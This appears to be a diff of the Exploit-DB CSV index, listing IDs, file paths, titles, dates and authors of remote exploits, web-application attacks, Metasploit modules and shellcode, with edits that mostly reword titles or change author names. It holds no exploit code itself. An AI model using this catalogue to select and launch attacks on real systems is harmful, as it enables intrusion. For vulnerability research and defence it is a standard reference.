2951,platforms/multiple/remote/2951.sql,"Oracle 9i/10g - 'extproc' Local/Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0
2959,platforms/linux/remote/2959.sql,"Oracle 9i/10g - 'utl_file' FileSystem Access Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0
2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0
3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (2)",2003-10-15,"Solar Eclipse",linux,remote,21
3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (2)",2003-10-15,"Solar Eclipse",linux,remote,21
3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445
3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow",2006-12-29,rgod,windows,remote,4002
3055,platforms/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0
3058,platforms/windows/remote/3058.html,"Rediff Bol Downloader - (ActiveX Control) Execute Local File Exploit",2006-12-31,"Gregory R. Panakkal",windows,remote,0
3063,platforms/windows/remote/3063.pl,"Formbankserver 1.9 - (Name) Directory Traversal",2007-01-01,Bl0od3r,windows,remote,0
3064,platforms/multiple/remote/3064.rb,"Apple QuickTime - 'rtsp URL Handler' Stack Buffer Overflow",2007-01-01,MoAB,multiple,remote,0
3067,platforms/windows/remote/3067.txt,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow (2)",2007-01-01,"Jacopo Cervini",windows,remote,25
3067,platforms/windows/remote/3067.txt,"QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (2)",2007-01-01,"Jacopo Cervini",windows,remote,25
3072,platforms/windows/remote/3072.py,"Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Buffer Overflow",2007-01-03,"Winny Thomas",windows,remote,0
3077,platforms/osx/remote/3077.rb,"Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting",2007-01-03,MoAB,osx,remote,0
3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin 7.0.x - (acroreader) Cross-Site Scripting",2007-01-05,"Stefano Di Paola",windows,remote,0
@ -9804,7 +9804,7 @@ id,file,description,date,author,platform,type,port
3099,platforms/linux/remote/3099.pm,"Berlios GPSD 2.7 - Remote Format String (Metasploit)",2007-01-08,Enseirb,linux,remote,2947
3107,platforms/windows/remote/3107.pm,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (Metasploit)",2007-01-09,"Jacopo Cervini",windows,remote,21
40404,platforms/php/remote/40404.rb,"Kaltura 11.1.0-2 - Remote Code Execution (Metasploit)",2016-09-21,"Mehmet Ince",php,remote,80
3132,platforms/windows/remote/3132.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",windows,remote,69
3132,platforms/windows/remote/3132.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",windows,remote,69
3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 - IMAP Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,143
3137,platforms/windows/remote/3137.html,"Microsoft Internet Explorer - VML Remote Buffer Overflow (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0
3140,platforms/windows/remote/3140.pl,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow",2007-01-17,UmZ,windows,remote,21
@ -10217,10 +10217,10 @@ id,file,description,date,author,platform,type,port
6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-22,"Guido Landi",windows,remote,0
6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution",2008-07-22,Koshi,windows,remote,0
6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0
6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (Metasploit)",2008-07-23,I)ruid,multiple,remote,0
6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (Python)",2008-07-24,"Julien Desfossez",multiple,remote,0
6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning Exploit (Metasploit)",2008-07-23,I)ruid,multiple,remote,0
6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Exploit (Python)",2008-07-24,"Julien Desfossez",multiple,remote,0
6124,platforms/windows/remote/6124.c,"Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0
6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit",2008-07-25,"Marc Bevand",multiple,remote,0
6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Exploit",2008-07-25,"Marc Bevand",multiple,remote,0
6151,platforms/windows/remote/6151.txt,"Velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote,0
6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote,0
6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) - FTP Server Remote Exploit (Attached to GDB)",2008-07-29,"Andy Davis",hardware,remote,0
@ -10230,13 +10230,13 @@ id,file,description,date,author,platform,type,port
6220,platforms/windows/remote/6220.html,"Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow",2008-08-10,"Guido Landi",windows,remote,0
6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution",2008-08-10,"Wojciech Pawlikowski",windows,remote,0
6229,platforms/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)",2008-08-11,"Simon Ryeo",multiple,remote,0
6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0
6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - 'Randomized Ports' Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0
6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow",2008-08-13,kralor,windows,remote,0
6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH Stack Overflow",2008-08-15,SkOd,windows,remote,21
6256,platforms/windows/remote/6256.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' Buffer Overflow (SafeSEH)",2008-08-17,"Guido Landi",windows,remote,0
6278,platforms/windows/remote/6278.txt,"Anzio Web Print Object 3.2.30 - ActiveX Buffer Overflow",2008-08-20,"Core Security",windows,remote,0
6302,platforms/windows/remote/6302.pl,"Dana IRC 1.4a - Remote Buffer Overflow",2008-08-25,"Guido Landi",windows,remote,0
6305,platforms/hardware/remote/6305.htm,"Belkin Wireless G router + ADSL2 modem - Authentication Bypass",2008-08-25,noensr,hardware,remote,0
6305,platforms/hardware/remote/6305.htm,"Belkin Wireless G Router / ADSL2 Modem - Authentication Bypass",2008-08-25,noensr,hardware,remote,0
6317,platforms/windows/remote/6317.html,"Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow",2008-08-26,Koshi,windows,remote,0
6318,platforms/windows/remote/6318.html,"Ultra Shareware Office Control - ActiveX Control Remote Buffer Overflow",2008-08-27,shinnai,windows,remote,0
6323,platforms/windows/remote/6323.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Remote Buffer Overflow",2008-08-28,spdr,windows,remote,0
@ -10478,9 +10478,9 @@ id,file,description,date,author,platform,type,port
9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - 'Response' Remote Buffer Overflow (SEH)",2009-07-12,His0k4,windows,remote,0
9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow",2009-07-13,Sberry,windows,remote,0
9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Local/Remote Multiple Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0
9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0
9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0
9209,platforms/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,hardware,remote,0
9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (2)",2009-07-20,netsoul,windows,remote,0
9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (2)",2009-07-20,netsoul,windows,remote,0
9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0
9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0
9278,platforms/freebsd/remote/9278.txt,"NcFTPd 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,freebsd,remote,0
@ -10548,7 +10548,7 @@ id,file,description,date,author,platform,type,port
9913,platforms/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25
9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783
9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",multiple,remote,3632
9917,platforms/solaris/remote/9917.rb,"Solaris in.TelnetD - 'TTYPROMPT' Buffer Overflow (Metasploit)",2002-01-18,MC,solaris,remote,23
9917,platforms/solaris/remote/9917.rb,"Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (Metasploit)",2002-01-18,MC,solaris,remote,23
9918,platforms/solaris/remote/9918.rb,"Solaris 10/11 Telnet - Remote Authentication Bypass (Metasploit)",2007-02-12,MC,solaris,remote,23
9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow (Metasploit)",2008-10-14,"Adriano Lima",solaris,remote,111
9921,platforms/solaris/remote/9921.rb,"Solaris 8.0 LPD - Command Execution (Metasploit)",2001-08-31,"H D Moore",solaris,remote,515
@ -10983,7 +10983,7 @@ id,file,description,date,author,platform,type,port
16324,platforms/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,multiple,remote,0
16325,platforms/solaris/remote/16325.rb,"Sun Solaris sadmind - 'adm_build_path()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,solaris,remote,0
16326,platforms/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution (Metasploit)",2010-07-25,Metasploit,solaris,remote,0
16327,platforms/solaris/remote/16327.rb,"Solaris in.TelnetD - TTYPROMPT Buffer Overflow (Metasploit)",2010-06-22,Metasploit,solaris,remote,0
16327,platforms/solaris/remote/16327.rb,"Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (Metasploit)",2010-06-22,Metasploit,solaris,remote,0
16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet - Remote Authentication Bypass (Metasploit)",2010-06-22,Metasploit,solaris,remote,0
16329,platforms/solaris/remote/16329.rb,"Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,solaris,remote,0
16330,platforms/solaris_sparc/remote/16330.rb,"Samba 2.2.8 (Solaris SPARC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,solaris_sparc,remote,0
@ -11789,8 +11789,8 @@ id,file,description,date,author,platform,type,port
19107,platforms/linux/remote/19107.c,"Netscape Messaging Server 3.55 & University of Washington imapd 10.234 - Buffer Overflow",1998-07-17,anonymous,linux,remote,0
19109,platforms/linux/remote/19109.c,"Qualcomm qpopper 2.4 - POP Server Buffer Overflow (1)",1998-06-27,"Seth McGann",linux,remote,0
19110,platforms/unix/remote/19110.c,"Qualcomm qpopper 2.4 - POP Server Buffer Overflow (2)",1998-06-27,"Miroslaw Grzybek",unix,remote,0
19111,platforms/linux/remote/19111.c,"Multiple OSes - BIND Buffer Overflow (1)",1998-04-08,ROTShB,linux,remote,0
19112,platforms/linux/remote/19112.c,"Multiple OSes - BIND Buffer Overflow (2)",1998-04-08,prym,linux,remote,0
19111,platforms/linux/remote/19111.c,"ISC BIND (Linux/BSD) - Buffer Overflow (1)",1998-04-08,ROTShB,linux,remote,0
19112,platforms/linux/remote/19112.c,"ISC BIND (Multiple OSes) - Buffer Overflow (2)",1998-04-08,prym,linux,remote,0
19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - TelnetD",1999-01-02,"Tomas Halgas",windows,remote,23
19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",multiple,remote,0
19119,platforms/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon - Exploit",1998-07-06,"RSI Advise",linux,remote,0
@ -13740,8 +13740,8 @@ id,file,description,date,author,platform,type,port
25421,platforms/windows/remote/25421.txt,"RSA Security RSA Authentication Agent For Web 5.2 - Cross-Site Scripting",2005-04-15,"Oliver Karow",windows,remote,0
25445,platforms/multiple/remote/25445.rb,"SAP SOAP RFC - SXPG_CALL_SYSTEM Remote Command Execution (Metasploit)",2013-05-14,Metasploit,multiple,remote,8000
25446,platforms/multiple/remote/25446.rb,"SAP SOAP RFC - SXPG_COMMAND_EXECUTE Remote Command Execution (Metasploit)",2013-05-14,Metasploit,multiple,remote,8000
25452,platforms/multiple/remote/25452.pl,"Oracle 10g Database - SUBSCRIPTION_NAME SQL Injection (1)",2007-02-23,bunker,multiple,remote,0
25453,platforms/multiple/remote/25453.pl,"Oracle 10g Database - SUBSCRIPTION_NAME SQL Injection (2)",2007-02-26,bunker,multiple,remote,0
25452,platforms/multiple/remote/25452.pl,"Oracle 10g Database - 'SUBSCRIPTION_NAME' SQL Injection (1)",2007-02-23,bunker,multiple,remote,0
25453,platforms/multiple/remote/25453.pl,"Oracle 10g Database - 'SUBSCRIPTION_NAME' SQL Injection (2)",2007-02-26,bunker,multiple,remote,0
25454,platforms/windows/remote/25454.txt,"Microsoft Windows 98/2000 Explorer - Preview Pane Script Injection",2005-04-19,"GreyMagic Software",windows,remote,0
25486,platforms/windows/remote/25486.txt,"RaidenFTPd 2.4 - Unauthorized File Access",2005-04-21,"Lachlan. H",windows,remote,0
25487,platforms/windows/remote/25487.txt,"yawcam 0.2.5 - Directory Traversal",2005-04-21,"Donato Ferrante",windows,remote,0
@ -15100,7 +15100,7 @@ id,file,description,date,author,platform,type,port
35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Parameter Cross-Site Scripting",2011-06-01,"Stefan Schurtz",multiple,remote,0
35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,linux,remote,0
35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change",2015-02-05,"Todor Donev",hardware,remote,0
35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Unauthenticated Remote DNS Change",2015-02-05,"Todor Donev",hardware,remote,0
35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0
35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated Arbitrary File Upload (Metasploit)",2015-01-20,Metasploit,java,remote,8080
35855,platforms/php/remote/35855.txt,"PHP 5.3.6 - Security Bypass",2011-06-14,"Krzysztof Kotowicz",php,remote,0
@ -15549,7 +15549,7 @@ id,file,description,date,author,platform,type,port
39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0
39858,platforms/windows/remote/39858.py,"HP Data Protector A.09.00 - Arbitrary Command Execution",2016-05-26,"Ian Lovering",windows,remote,0
39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x - C2 Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460
39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x (C2 Server) - Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460
39917,platforms/cgi/remote/39917.rb,"IPFire - proxy.cgi Remote Code Execution (Metasploit)",2016-06-10,Metasploit,cgi,remote,444
39918,platforms/cgi/remote/39918.rb,"IPFire - Bash Environment Variable Injection (Shellshock) (Metasploit)",2016-06-10,Metasploit,cgi,remote,444
39919,platforms/multiple/remote/39919.rb,"Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-06-10,Metasploit,multiple,remote,8080
@ -15796,7 +15796,7 @@ id,file,description,date,author,platform,type,port
42599,platforms/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0
42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
42630,platforms/windows/remote/42630.rb,"Gh0st Client - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
42630,platforms/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -21325,7 +21325,7 @@ id,file,description,date,author,platform,type,port
8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0
8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - 'admin.txt' File Disclosure",2009-02-20,Pouya_Server,php,webapps,0
8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' Command Injection (via SQL Injection)",2009-02-20,Osirys,php,webapps,0
8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated",2009-02-23,ahmadbady,php,webapps,0
8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated Admin Bypass",2009-02-23,ahmadbady,php,webapps,0
8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - 'notes.php' Remote Command Execution",2009-02-23,JosS,php,webapps,0
8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0
8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0
@ -23803,7 +23803,7 @@ id,file,description,date,author,platform,type,port
12610,platforms/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",multiple,webapps,0
12611,platforms/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0
12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,php,webapps,0
12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 - (tiny_mce) Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps,0
12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 - 'tiny_mce' Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps,0
12615,platforms/php/webapps/12615.txt,"Joomla! Component com_camp - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0
12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0
12618,platforms/php/webapps/12618.txt,"Joomla! Component simpledownload 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0
@ -24634,7 +24634,7 @@ id,file,description,date,author,platform,type,port
15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File",2010-09-28,Abysssec,asp,webapps,0
15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass",2010-09-28,Abysssec,php,webapps,0
15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQL Injection) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0
15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorisation Flaws",2010-09-28,"Pablo Milano",php,webapps,0
15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorisation Vulnerabilities",2010-09-28,"Pablo Milano",php,webapps,0
15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - Cross-Site Request Forgery",2010-09-28,"Pablo Milano",php,webapps,0
15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent Cross-Site Scripting",2010-09-28,"SecPod Research",php,webapps,0
15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 - asearch.php SQL Injection",2010-09-29,"silent vapor",php,webapps,0
@ -25025,7 +25025,7 @@ id,file,description,date,author,platform,type,port
15989,platforms/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
15993,platforms/php/webapps/15993.html,"ViArt Shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps,0
15995,platforms/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",2011-01-15,Saif,php,webapps,0
15996,platforms/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0
15996,platforms/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",2011-01-15,"Patrick de Brouwer",php,webapps,0
15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",2011-01-16,mr_me,jsp,webapps,0
15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 - (bid) Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0
16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent Cross-Site Scripting",2011-01-16,"Mark Stanislav",php,webapps,0
@ -25897,7 +25897,7 @@ id,file,description,date,author,platform,type,port
18509,platforms/hardware/webapps/18509.html,"D-Link DCS Series - Cross-Site Request Forgery (Change Admin Password)",2012-02-22,rigan,hardware,webapps,0
18510,platforms/windows/webapps/18510.txt,"WebcamXP and webcam 7 - Directory Traversal",2012-02-22,Silent_Dream,windows,webapps,0
18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B ADSL Router - Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0
18516,platforms/php/webapps/18516.txt,"phpDenora 1.4.6 - Multiple SQL Injections",2012-02-23,NLSecurity,php,webapps,0
18516,platforms/php/webapps/18516.txt,"phpDenora 1.4.6 - Multiple SQL Injections",2012-02-23,"Patrick de Brouwer",php,webapps,0
18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",hardware,webapps,0
18519,platforms/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,php,webapps,0
18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 (English/Italian) - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",php,webapps,0
@ -26206,7 +26206,7 @@ id,file,description,date,author,platform,type,port
20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php' 'groupid' Parameter Blind SQL Injection",2012-07-30,Kc57,php,webapps,0
20124,platforms/windows/webapps/20124.txt,"Dr. Web Control Center 6.00.3.201111300 - Cross-Site Scripting",2012-07-31,"Oliver Karow",windows,webapps,0
20158,platforms/php/webapps/20158.txt,"PHP-Nuke 1.0/2.5 - Administrative Privileges",2000-08-21,bruj0,php,webapps,0
20166,platforms/php/webapps/20166.txt,"Joomla! Component 'com_niceajaxpoll' 1.3.0 - SQL Injection",2012-08-01,NLSecurity,php,webapps,0
20166,platforms/php/webapps/20166.txt,"Joomla! Component 'com_niceajaxpoll' 1.3.0 - SQL Injection",2012-08-01,"Patrick de Brouwer",php,webapps,0
20170,platforms/php/webapps/20170.txt,"Joomla! Component 'com_movm' - SQL Injection",2012-08-01,D4NB4R,php,webapps,0
20171,platforms/php/webapps/20171.txt,"ManageEngine Application Manager 10 - Multiple Vulnerabilities",2012-08-01,Vulnerability-Lab,php,webapps,0
20172,platforms/php/webapps/20172.txt,"ManageEngine Mobile Application Manager 10 - SQL Injection",2012-08-01,Vulnerability-Lab,php,webapps,0
@ -26676,8 +26676,8 @@ id,file,description,date,author,platform,type,port
22166,platforms/php/webapps/22166.txt,"Geeklog 1.3.7 - Homepage User Field HTML Injection",2003-01-14,snooq,php,webapps,0
22167,platforms/php/webapps/22167.txt,"vAuthenticate 2.8 - SQL Injection",2003-01-14,frog,php,webapps,0
22168,platforms/php/webapps/22168.txt,"vSignup 2.1 - SQL Injection",2003-01-14,frog,php,webapps,0
22169,platforms/cgi/webapps/22169.pl,"Psunami Bulletin Board 0.x - Psunami.cgi Remote Command Execution (1)",2003-01-13,dodo,cgi,webapps,0
22170,platforms/cgi/webapps/22170.pl,"Psunami Bulletin Board 0.x - Psunami.cgi Remote Command Execution (2)",2003-01-13,spabam,cgi,webapps,0
22169,platforms/cgi/webapps/22169.pl,"Psunami Bulletin Board 0.x - 'Psunami.cgi' Remote Command Execution (1)",2003-01-13,dodo,cgi,webapps,0
22170,platforms/cgi/webapps/22170.pl,"Psunami Bulletin Board 0.x - 'Psunami.cgi' Remote Command Execution (2)",2003-01-13,spabam,cgi,webapps,0
22175,platforms/php/webapps/22175.txt,"PHP TopSites 2.0/2.2 - HTML Injection",2003-01-15,"Cyberarmy Application",php,webapps,0
22176,platforms/php/webapps/22176.txt,"PHP TopSites 2.0/2.2 - help.php Cross-Site Scripting",2003-01-15,"Cyberarmy Application",php,webapps,0
22177,platforms/php/webapps/22177.txt,"PHP TopSites 2.0/2.2 - edit.php SQL Injection",2003-01-15,"Cyberarmy Application",php,webapps,0
@ -34619,7 +34619,7 @@ id,file,description,date,author,platform,type,port
35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted Arbitrary File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80
35224,platforms/php/webapps/35224.txt,"MyBB 1.8.x - Multiple Vulnerabilities",2014-11-13,smash,php,webapps,80
35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched - 'elimina' Parameter SQL Injection",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0
35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-01-15,NLSecurity,php,webapps,0
35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-01-15,"Patrick de Brouwer",php,webapps,0
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' Parameter SQL Injection",2011-01-16,ShivX,php,webapps,0
35233,platforms/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
